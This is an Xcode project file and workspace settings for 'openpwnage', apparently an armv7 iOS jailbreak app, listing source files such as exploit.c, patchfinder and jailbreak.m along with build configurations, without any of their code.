 35 | 		B0058152284B22E500B0A55F /* kernel_memory.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kernel_memory.h; sourceTree = "<group>"; };
 36 | 		B0058153284B22E500B0A55F /* sp_offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = sp_offsets.h; sourceTree = "<group>"; };
 37 | 		B0058154284B22E500B0A55F /* exploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = exploit.h; sourceTree = "<group>"; };
 38 | 		B0058155284B22E500B0A55F /* exploit_utilities.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = exploit_utilities.h; sourceTree = "<group>"; };
 39 | 		B0058156284B22E500B0A55F /* iosurface.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = iosurface.h; sourceTree = "<group>"; };
 40 | 		B0058157284B22E500B0A55F /* kernel_memory.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kernel_memory.c; sourceTree = "<group>"; };
 41 | 		B0058158284B22E500B0A55F /* sp_offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = sp_offsets.m; sourceTree = "<group>"; };
 42 | 		B0058159284B22E500B0A55F /* iosurface.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = iosurface.c; sourceTree = "<group>"; };
 43 | 		B005815A284B22E500B0A55F /* exploit_utilities.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = exploit_utilities.c; sourceTree = "<group>"; };
 44 | 		B005815B284B22E500B0A55F /* exploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = exploit.c; sourceTree = "<group>"; };
 45 | 		B00EE4E12851269700DA200C /* trident.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = trident.m; sourceTree = "<group>"; };
 46 | 		B00EE4E92851A55900DA200C /* patchfinder8.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder8.h; sourceTree = "<group>"; };
 47 | 		B00EE4EA2851A55900DA200C /* patchfinder8.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = patchfinder8.c; sourceTree = "<group>"; };
 48 | 		B03D34A4284BFB130052E025 /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = "<group>"; };
 49 | 		B0463B872815AF4500F6C07E /* jailbreak.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = "<group>"; };
 50 | 		B0463B8C2815BB5C00F6C07E /* jailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = jailbreak.h; sourceTree = "<group>"; };
 51 | 		B05E8BB22810C16E00EA3CE0 /* openpwnage.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = openpwnage.app; sourceTree = BUILT_PRODUCTS_DIR; };
 52 | 		B05E8BB52810C16E00EA3CE0 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = "<group>"; };
 53 | 		B05E8BB62810C16E00EA3CE0 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = "<group>"; };
 54 | 		B05E8BBB2810C16E00EA3CE0 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = "<group>"; };
 55 | 		B05E8BBC2810C16E00EA3CE0 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = "<group>"; };
 56 | 		B05E8BBF2810C16E00EA3CE0 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = "<group>"; };
 57 | 		B05E8BC12810C17300EA3CE0 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = "<group>"; };
 58 | 		B05E8BC42810C17300EA3CE0 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = "<group>"; };
 59 | 		B05E8BC72810C17300EA3CE0 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = "<group>"; };
 60 | 		B05E8BCE2810C8A600EA3CE0 /* Info.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
 61 | 		B06829C4284C124F00C4B92C /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = "<group>"; };
 62 | 		B086939B2812E7A400E9CAAD /* phoenix.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = phoenix.m; sourceTree = "<group>"; };
 63 | 		B0A59D71288C632300943659 /* pf10.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = pf10.h; sourceTree = "<group>"; };
 64 | 		B0A59D72288C632300943659 /* pf10.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = pf10.c; sourceTree = "<group>"; };
 65 | 		B0C29471281F01B100B00F98 /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = IOKit/IOKit.framework; sourceTree = "<group>"; };
 66 | 		B0D2591428601C0C00BAFA4C /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = bootstrap.tar; sourceTree = "<group>"; };
 67 | 		B0F470DB2839223A0019CB57 /* patchfinder.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder.h; sourceTree = "<group>"; };
 68 | 		B0F470DC2839223B0019CB57 /* patchfinder.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = patchfinder.c; sourceTree = "<group>"; };
 69 | 		B0F470E128407C7E0019CB57 /* SettingsViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = SettingsViewController.m; sourceTree = "<group>"; };
 70 | 		B0F470E328407C9C0019CB57 /* SettingsViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = SettingsViewController.h; sourceTree = "<group>"; };
 71 | /* End PBXFileReference section */
 72 | 
 73 | /* Begin PBXFrameworksBuildPhase section */
 74 | 		B05E8BAF2810C16E00EA3CE0 /* Frameworks */ = {
 75 | 			isa = PBXFrameworksBuildPhase;
 76 | 			buildActionMask = 2147483647;
 77 | 			files = (
 78 | 				B0C29472281F01B100B00F98 /* IOKit.framework in Frameworks */,
 79 | 			);
 80 | 			runOnlyForDeploymentPostprocessing = 0;
 81 | 		};
 82 | /* End PBXFrameworksBuildPhase section */
 83 | 
 84 | /* Begin PBXGroup section */
 85 | 		B0058151284B22E500B0A55F /* sock_port */ = {
 86 | 			isa = PBXGroup;
 87 | 			children = (
 88 | 				B0058152284B22E500B0A55F /* kernel_memory.h */,
 89 | 				B0058153284B22E500B0A55F /* sp_offsets.h */,
 90 | 				B0058154284B22E500B0A55F /* exploit.h */,
 91 | 				B0058155284B22E500B0A55F /* exploit_utilities.h */,
 92 | 				B0058156284B22E500B0A55F /* iosurface.h */,
 93 | 				B0058157284B22E500B0A55F /* kernel_memory.c */,
 94 | 				B0058158284B22E500B0A55F /* sp_offsets.m */,
 95 | 				B0058159284B22E500B0A55F /* iosurface.c */,
 96 | 				B005815A284B22E500B0A55F /* exploit_utilities.c */,
 97 | 				B005815B284B22E500B0A55F /* exploit.c */,
 98 | 				B0A59D71288C632300943659 /* pf10.h */,
 99 | 				B0A59D72288C632300943659 /* pf10.c */,
100 | 			);
101 | 			path = sock_port;
102 | 			sourceTree = "<group>";
103 | 		};
104 | 		B05E8BA92810C16D00EA3CE0 = {
105 | 			isa = PBXGroup;
106 | 			children = (
107 | 				B05E8BB42810C16E00EA3CE0 /* openpwnage */,
108 | 				B05E8BB32810C16E00EA3CE0 /* Products */,
109 | 				B0E990482811C40E00A9FFC4 /* Frameworks */,
110 | 			);
111 | 			sourceTree = "<group>";
112 | 		};
113 | 		B05E8BB32810C16E00EA3CE0 /* Products */ = {
114 | 			isa = PBXGroup;
115 | 			children = (
116 | 				B05E8BB22810C16E00EA3CE0 /* openpwnage.app */,
117 | 			);
118 | 			name = Products;
119 | 			sourceTree = "<group>";
120 | 		};
121 | 		B05E8BB42810C16E00EA3CE0 /* openpwnage */ = {
122 | 			isa = PBXGroup;
123 | 			children = (
124 | 				B06829C4284C124F00C4B92C /* launchctl */,
125 | 				B03D34A4284BFB130052E025 /* tar */,
126 | 				B0D2591428601C0C00BAFA4C /* bootstrap.tar */,
127 | 				B0058151284B22E500B0A55F /* sock_port */,
128 | 				B0F470DB2839223A0019CB57 /* patchfinder.h */,
129 | 				B0F470DC2839223B0019CB57 /* patchfinder.c */,
130 | 				B05E8BB52810C16E00EA3CE0 /* AppDelegate.h */,
131 | 				B05E8BB62810C16E00EA3CE0 /* AppDelegate.m */,
132 | 				B05E8BBB2810C16E00EA3CE0 /* ViewController.h */,
133 | 				B05E8BBC2810C16E00EA3CE0 /* ViewController.m */,
134 | 				B05E8BBE2810C16E00EA3CE0 /* Main.storyboard */,
135 | 				B05E8BC12810C17300EA3CE0 /* Assets.xcassets */,
136 | 				B05E8BC32810C17300EA3CE0 /* LaunchScreen.storyboard */,
137 | 				B05E8BCE2810C8A600EA3CE0 /* Info.plist */,
138 | 				B05E8BC72810C17300EA3CE0 /* main.m */,
139 | 				B086939B2812E7A400E9CAAD /* phoenix.m */,
140 | 				B0463B872815AF4500F6C07E /* jailbreak.m */,
141 | 				B0463B8C2815BB5C00F6C07E /* jailbreak.h */,
142 | 				B0F470E128407C7E0019CB57 /* SettingsViewController.m */,
143 | 				B0F470E328407C9C0019CB57 /* SettingsViewController.h */,
144 | 				B00EE4E12851269700DA200C /* trident.m */,
145 | 				B00EE4E92851A55900DA200C /* patchfinder8.h */,
146 | 				B00EE4EA2851A55900DA200C /* patchfinder8.c */,
147 | 			);
148 | 			path = openpwnage;
149 | 			sourceTree = "<group>";
150 | 		};
151 | 		B0E990482811C40E00A9FFC4 /* Frameworks */ = {
152 | 			isa = PBXGroup;
153 | 			children = (
154 | 				B0C29471281F01B100B00F98 /* IOKit.framework */,
155 | 			);
156 | 			name = Frameworks;
157 | 			sourceTree = "<group>";
158 | 		};
159 | /* End PBXGroup section */
160 | 
161 | /* Begin PBXNativeTarget section */
162 | 		B05E8BB12810C16E00EA3CE0 /* openpwnage */ = {
163 | 			isa = PBXNativeTarget;
164 | 			buildConfigurationList = B05E8BCB2810C17300EA3CE0 /* Build configuration list for PBXNativeTarget "openpwnage" */;
165 | 			buildPhases = (
166 | 				B05E8BAE2810C16E00EA3CE0 /* Sources */,
167 | 				B05E8BAF2810C16E00EA3CE0 /* Frameworks */,
168 | 				B05E8BB02810C16E00EA3CE0 /* Resources */,
169 | 			);
170 | 			buildRules = (
171 | 			);
172 | 			dependencies = (
173 | 			);
174 | 			name = openpwnage;
175 | 			productName = openpwnage;
176 | 			productReference = B05E8BB22810C16E00EA3CE0 /* openpwnage.app */;
177 | 			productType = "com.apple.product-type.application";
178 | 		};
179 | /* End PBXNativeTarget section */
180 | 
181 | /* Begin PBXProject section */
182 | 		B05E8BAA2810C16D00EA3CE0 /* Project object */ = {
183 | 			isa = PBXProject;
184 | 			attributes = {
185 | 				BuildIndependentTargetsInParallel = 1;
186 | 				LastUpgradeCheck = 1310;
187 | 				TargetAttributes = {
188 | 					B05E8BB12810C16E00EA3CE0 = {
189 | 						CreatedOnToolsVersion = 13.1;
190 | 					};
191 | 				};
192 | 			};
193 | 			buildConfigurationList = B05E8BAD2810C16D00EA3CE0 /* Build configuration list for PBXProject "openpwnage" */;
194 | 			compatibilityVersion = "Xcode 13.0";
195 | 			developmentRegion = en;
196 | 			hasScannedForEncodings = 0;
197 | 			knownRegions = (
198 | 				en,
199 | 				Base,
200 | 			);
201 | 			mainGroup = B05E8BA92810C16D00EA3CE0;
202 | 			productRefGroup = B05E8BB32810C16E00EA3CE0 /* Products */;
203 | 			projectDirPath = "";
204 | 			projectRoot = "";
205 | 			targets = (
206 | 				B05E8BB12810C16E00EA3CE0 /* openpwnage */,
207 | 			);
208 | 		};
209 | /* End PBXProject section */
210 | 
211 | /* Begin PBXResourcesBuildPhase section */
212 | 		B05E8BB02810C16E00EA3CE0 /* Resources */ = {
213 | 			isa = PBXResourcesBuildPhase;
214 | 			buildActionMask = 2147483647;
215 | 			files = (
216 | 				B05E8BC52810C17300EA3CE0 /* LaunchScreen.storyboard in Resources */,
217 | 				B05E8BC22810C17300EA3CE0 /* Assets.xcassets in Resources */,
218 | 				B05E8BC02810C16E00EA3CE0 /* Main.storyboard in Resources */,
219 | 				B03D34A5284BFB130052E025 /* tar in Resources */,
220 | 				B0D2591528601C0C00BAFA4C /* bootstrap.tar in Resources */,
221 | 				B06829C5284C124F00C4B92C /* launchctl in Resources */,
222 | 			);
223 | 			runOnlyForDeploymentPostprocessing = 0;
224 | 		};
225 | /* End PBXResourcesBuildPhase section */
226 | 
227 | /* Begin PBXSourcesBuildPhase section */
228 | 		B05E8BAE2810C16E00EA3CE0 /* Sources */ = {
229 | 			isa = PBXSourcesBuildPhase;
230 | 			buildActionMask = 2147483647;
231 | 			files = (
232 | 				B0A59D73288C632300943659 /* pf10.c in Sources */,
233 | 				B0F470DD2839223B0019CB57 /* patchfinder.c in Sources */,
234 | 				B005815C284B22E500B0A55F /* kernel_memory.c in Sources */,
235 | 				B05E8BBD2810C16E00EA3CE0 /* ViewController.m in Sources */,
236 | 				B086939C2812E7A400E9CAAD /* phoenix.m in Sources */,
237 | 				B005815D284B22E500B0A55F /* sp_offsets.m in Sources */,
238 | 				B05E8BB72810C16E00EA3CE0 /* AppDelegate.m in Sources */,
239 | 				B0463B882815AF4600F6C07E /* jailbreak.m in Sources */,
240 | 				B0058160284B22E500B0A55F /* exploit.c in Sources */,
241 | 				B00EE4E22851269700DA200C /* trident.m in Sources */,
242 | 				B05E8BC82810C17300EA3CE0 /* main.m in Sources */,
243 | 				B005815F284B22E500B0A55F /* exploit_utilities.c in Sources */,
244 | 				B0F470E228407C7E0019CB57 /* SettingsViewController.m in Sources */,
245 | 				B005815E284B22E500B0A55F /* iosurface.c in Sources */,
246 | 				B00EE4EB2851A55900DA200C /* patchfinder8.c in Sources */,
247 | 			);
248 | 			runOnlyForDeploymentPostprocessing = 0;
249 | 		};
250 | /* End PBXSourcesBuildPhase section */
251 | 
252 | /* Begin PBXVariantGroup section */
253 | 		B05E8BBE2810C16E00EA3CE0 /* Main.storyboard */ = {
254 | 			isa = PBXVariantGroup;
255 | 			children = (
256 | 				B05E8BBF2810C16E00EA3CE0 /* Base */,
257 | 			);
258 | 			name = Main.storyboard;
259 | 			sourceTree = "<group>";
260 | 		};
261 | 		B05E8BC32810C17300EA3CE0 /* LaunchScreen.storyboard */ = {
262 | 			isa = PBXVariantGroup;
263 | 			children = (
264 | 				B05E8BC42810C17300EA3CE0 /* Base */,
265 | 			);
266 | 			name = LaunchScreen.storyboard;
267 | 			sourceTree = "<group>";
268 | 		};
269 | /* End PBXVariantGroup section */
270 | 
271 | /* Begin XCBuildConfiguration section */
272 | 		B05E8BC92810C17300EA3CE0 /* Debug */ = {
273 | 			isa = XCBuildConfiguration;
274 | 			buildSettings = {
275 | 				ALWAYS_SEARCH_USER_PATHS = NO;
276 | 				ARCHS = armv7;
277 | 				CLANG_ANALYZER_NONNULL = YES;
278 | 				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
279 | 				CLANG_CXX_LANGUAGE_STANDARD = "gnu++17";
280 | 				CLANG_CXX_LIBRARY = "libc++";
281 | 				CLANG_ENABLE_MODULES = YES;
282 | 				CLANG_ENABLE_OBJC_ARC = YES;
283 | 				CLANG_ENABLE_OBJC_WEAK = YES;
284 | 				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
285 | 				CLANG_WARN_BOOL_CONVERSION = YES;
286 | 				CLANG_WARN_COMMA = YES;
287 | 				CLANG_WARN_CONSTANT_CONVERSION = YES;
288 | 				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
289 | 				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
290 | 				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
291 | 				CLANG_WARN_EMPTY_BODY = YES;
292 | 				CLANG_WARN_ENUM_CONVERSION = YES;
293 | 				CLANG_WARN_INFINITE_RECURSION = YES;
294 | 				CLANG_WARN_INT_CONVERSION = YES;
295 | 				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
296 | 				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
297 | 				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
298 | 				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
299 | 				CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES;
300 | 				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
301 | 				CLANG_WARN_STRICT_PROTOTYPES = YES;
302 | 				CLANG_WARN_SUSPICIOUS_MOVE = YES;
303 | 				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
304 | 				CLANG_WARN_UNREACHABLE_CODE = YES;
305 | 				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
306 | 				COPY_PHASE_STRIP = NO;
307 | 				DEBUG_INFORMATION_FORMAT = dwarf;
308 | 				ENABLE_STRICT_OBJC_MSGSEND = YES;
309 | 				ENABLE_TESTABILITY = YES;
310 | 				GCC_C_LANGUAGE_STANDARD = gnu11;
311 | 				GCC_DYNAMIC_NO_PIC = NO;
312 | 				GCC_NO_COMMON_BLOCKS = YES;
313 | 				GCC_OPTIMIZATION_LEVEL = 0;
314 | 				GCC_PREPROCESSOR_DEFINITIONS = (
315 | 					"DEBUG=1",
316 | 					"$(inherited)",
317 | 				);
318 | 				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
319 | 				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
320 | 				GCC_WARN_UNDECLARED_SELECTOR = YES;
321 | 				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
322 | 				GCC_WARN_UNUSED_FUNCTION = YES;
323 | 				GCC_WARN_UNUSED_VARIABLE = YES;
324 | 				IPHONEOS_DEPLOYMENT_TARGET = 7.0;
325 | 				MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE;
326 | 				MTL_FAST_MATH = YES;
327 | 				ONLY_ACTIVE_ARCH = YES;
328 | 				SDKROOT = iphoneos;
329 | 			};
330 | 			name = Debug;
331 | 		};
332 | 		B05E8BCA2810C17300EA3CE0 /* Release */ = {
333 | 			isa = XCBuildConfiguration;
334 | 			buildSettings = {
335 | 				ALWAYS_SEARCH_USER_PATHS = NO;
336 | 				ARCHS = armv7;
337 | 				CLANG_ANALYZER_NONNULL = YES;
338 | 				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
339 | 				CLANG_CXX_LANGUAGE_STANDARD = "gnu++17";
340 | 				CLANG_CXX_LIBRARY = "libc++";
341 | 				CLANG_ENABLE_MODULES = YES;
342 | 				CLANG_ENABLE_OBJC_ARC = YES;
343 | 				CLANG_ENABLE_OBJC_WEAK = YES;
344 | 				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
345 | 				CLANG_WARN_BOOL_CONVERSION = YES;
346 | 				CLANG_WARN_COMMA = YES;
347 | 				CLANG_WARN_CONSTANT_CONVERSION = YES;
348 | 				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
349 | 				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
350 | 				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
351 | 				CLANG_WARN_EMPTY_BODY = YES;
352 | 				CLANG_WARN_ENUM_CONVERSION = YES;
353 | 				CLANG_WARN_INFINITE_RECURSION = YES;
354 | 				CLANG_WARN_INT_CONVERSION = YES;
355 | 				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
356 | 				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
357 | 				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
358 | 				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
359 | 				CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES;
360 | 				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
361 | 				CLANG_WARN_STRICT_PROTOTYPES = YES;
362 | 				CLANG_WARN_SUSPICIOUS_MOVE = YES;
363 | 				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
364 | 				CLANG_WARN_UNREACHABLE_CODE = YES;
365 | 				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
366 | 				COPY_PHASE_STRIP = NO;
367 | 				DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym";
368 | 				ENABLE_NS_ASSERTIONS = NO;
369 | 				ENABLE_STRICT_OBJC_MSGSEND = YES;
370 | 				GCC_C_LANGUAGE_STANDARD = gnu11;
371 | 				GCC_NO_COMMON_BLOCKS = YES;
372 | 				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
373 | 				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
374 | 				GCC_WARN_UNDECLARED_SELECTOR = YES;
375 | 				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
376 | 				GCC_WARN_UNUSED_FUNCTION = YES;
377 | 				GCC_WARN_UNUSED_VARIABLE = YES;
378 | 				IPHONEOS_DEPLOYMENT_TARGET = 7.0;
379 | 				MTL_ENABLE_DEBUG_INFO = NO;
380 | 				MTL_FAST_MATH = YES;
381 | 				SDKROOT = iphoneos;
382 | 				VALIDATE_PRODUCT = YES;
383 | 			};
384 | 			name = Release;
385 | 		};
386 | 		B05E8BCC2810C17300EA3CE0 /* Debug */ = {
387 | 			isa = XCBuildConfiguration;
388 | 			buildSettings = {
389 | 				ARCHS = armv7;
390 | 				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
391 | 				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
392 | 				CODE_SIGN_STYLE = Automatic;
393 | 				CURRENT_PROJECT_VERSION = 10;
394 | 				DEVELOPMENT_TEAM = RR5WP5NG77;
395 | 				FRAMEWORK_SEARCH_PATHS = (
396 | 					"$(inherited)",
397 | 					"$(PROJECT_DIR)/IOKit",
398 | 				);
399 | 				GENERATE_INFOPLIST_FILE = YES;
400 | 				INFOPLIST_FILE = openpwnage/Info.plist;
401 | 				INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES;
402 | 				INFOPLIST_KEY_UILaunchStoryboardName = LaunchScreen;
403 | 				INFOPLIST_KEY_UIMainStoryboardFile = Main;
404 | 				INFOPLIST_KEY_UIRequiredDeviceCapabilities = armv7;
405 | 				INFOPLIST_KEY_UIRequiresFullScreen = YES;
406 | 				INFOPLIST_KEY_UISupportedInterfaceOrientations = UIInterfaceOrientationPortrait;
407 | 				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown";
408 | 				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
409 | 				IPHONEOS_DEPLOYMENT_TARGET = 7.0;
410 | 				LD_RUNPATH_SEARCH_PATHS = (
411 | 					"$(inherited)",
412 | 					"@executable_path/Frameworks",
413 | 				);
414 | 				MARKETING_VERSION = 1.0;
415 | 				ONLY_ACTIVE_ARCH = NO;
416 | 				PRODUCT_BUNDLE_IDENTIFIER = com.zachary7829.openpwnage;
417 | 				PRODUCT_NAME = "$(TARGET_NAME)";
418 | 				SWIFT_EMIT_LOC_STRINGS = YES;
419 | 				TARGETED_DEVICE_FAMILY = "1,2";
420 | 			};
421 | 			name = Debug;
422 | 		};
423 | 		B05E8BCD2810C17300EA3CE0 /* Release */ = {
424 | 			isa = XCBuildConfiguration;
425 | 			buildSettings = {
426 | 				ARCHS = armv7;
427 | 				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
428 | 				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
429 | 				CODE_SIGN_STYLE = Automatic;
430 | 				CURRENT_PROJECT_VERSION = 10;
431 | 				DEVELOPMENT_TEAM = RR5WP5NG77;
432 | 				FRAMEWORK_SEARCH_PATHS = (
433 | 					"$(inherited)",
434 | 					"$(PROJECT_DIR)/IOKit",
435 | 				);
436 | 				GENERATE_INFOPLIST_FILE = YES;
437 | 				INFOPLIST_FILE = openpwnage/Info.plist;
438 | 				INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES;
439 | 				INFOPLIST_KEY_UILaunchStoryboardName = LaunchScreen;
440 | 				INFOPLIST_KEY_UIMainStoryboardFile = Main;
441 | 				INFOPLIST_KEY_UIRequiredDeviceCapabilities = armv7;
442 | 				INFOPLIST_KEY_UIRequiresFullScreen = YES;
443 | 				INFOPLIST_KEY_UISupportedInterfaceOrientations = UIInterfaceOrientationPortrait;
444 | 				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown";
445 | 				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
446 | 				IPHONEOS_DEPLOYMENT_TARGET = 7.0;
447 | 				LD_RUNPATH_SEARCH_PATHS = (
448 | 					"$(inherited)",
449 | 					"@executable_path/Frameworks",
450 | 				);
451 | 				MARKETING_VERSION = 1.0;
452 | 				PRODUCT_BUNDLE_IDENTIFIER = com.zachary7829.openpwnage;
453 | 				PRODUCT_NAME = "$(TARGET_NAME)";
454 | 				SWIFT_EMIT_LOC_STRINGS = YES;
455 | 				TARGETED_DEVICE_FAMILY = "1,2";
456 | 			};
457 | 			name = Release;
458 | 		};
459 | /* End XCBuildConfiguration section */
460 | 
461 | /* Begin XCConfigurationList section */
462 | 		B05E8BAD2810C16D00EA3CE0 /* Build configuration list for PBXProject "openpwnage" */ = {
463 | 			isa = XCConfigurationList;
464 | 			buildConfigurations = (
465 | 				B05E8BC92810C17300EA3CE0 /* Debug */,
466 | 				B05E8BCA2810C17300EA3CE0 /* Release */,
467 | 			);
468 | 			defaultConfigurationIsVisible = 0;
469 | 			defaultConfigurationName = Release;
470 | 		};
471 | 		B05E8BCB2810C17300EA3CE0 /* Build configuration list for PBXNativeTarget "openpwnage" */ = {
472 | 			isa = XCConfigurationList;
473 | 			buildConfigurations = (
474 | 				B05E8BCC2810C17300EA3CE0 /* Debug */,
475 | 				B05E8BCD2810C17300EA3CE0 /* Release */,
476 | 			);
477 | 			defaultConfigurationIsVisible = 0;
478 | 			defaultConfigurationName = Release;
479 | 		};
480 | /* End XCConfigurationList section */
481 | 	};
482 | 	rootObject = B05E8BAA2810C16D00EA3CE0 /* Project object */;
483 | }
484 | 


--------------------------------------------------------------------------------
/openpwnage.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <Workspace
3 |    version = "1.0">
4 |    <FileRef
5 |       location = "self:">
6 |    </FileRef>
7 | </Workspace>
8 | 


--------------------------------------------------------------------------------
/openpwnage.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
3 | <plist version="1.0">
4 | <dict>
5 | 	<key>IDEDidComputeMac32BitWarning</key>
6 | 	<true/>
7 | </dict>
8 | </plist>
9 | 


--------------------------------------------------------------------------------
/openpwnage.xcodeproj/project.xcworkspace/xcshareddata/WorkspaceSettings.xcsettings:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>DisableBuildSystemDeprecationDiagnostic</key>
 6 | 	<true/>
 7 | 	<key>PreviewsEnabled</key>
 8 | 	<false/>
 9 | </dict>
10 | </plist>
11 | 


--------------------------------------------------------------------------------
/openpwnage.xcodeproj/project.xcworkspace/xcuserdata/zachary7829.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage.xcodeproj/project.xcworkspace/xcuserdata/zachary7829.xcuserdatad/UserInterfaceState.xcuserstate


--------------------------------------------------------------------------------
/openpwnage.xcodeproj/project.xcworkspace/xcuserdata/zachary7829.xcuserdatad/WorkspaceSettings.xcsettings:
--------------------------------------------------------------------------------
